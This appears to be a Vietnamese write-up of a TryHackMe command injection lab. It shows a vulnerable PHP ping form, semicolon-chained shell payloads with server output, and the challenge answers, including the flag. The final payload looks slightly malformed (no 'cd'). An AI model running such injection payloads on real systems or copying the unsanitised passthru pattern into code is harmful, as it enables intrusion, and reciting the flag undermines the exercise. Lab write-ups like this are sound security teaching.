Mô tả
Thử thách Command Injection
Tìm nội dung của cờ trong
/home/tryhackme/flag.txt.
Tiếp cận
Form có dạng một trường nhập IP để thực hiện lệnh ping.
- Nhập
127.0.0.1trả về kết quảping4 gói tin. - Thử payload
;whoami, server trả vềwww-data. - Thử
;ls, server trả về danh sách các tệp trong thư mục hiện tại. - Thử
;cat index.phpđể xem mã nguồn, ta thấy đoạn code:"; $result = passthru("/bin/ping -c 4 ".$_GET["address"]); } ?> - Sử dụng
;pwdđể xác định thư mục hiện tại:/var/www/html. - Để đọc cờ, ta cần truy cập
/home/tryhackmevà đọcflag.txt. Payload:;/home/tryhackme;cat flag.txt
Cờ
User mà ứng dụng đang chạy là gì?
www-data
Nội dung của cờ trong /home/tryhackme/flag.txt là gì?
THM{COMMAND_INJECTION_COMPLETE}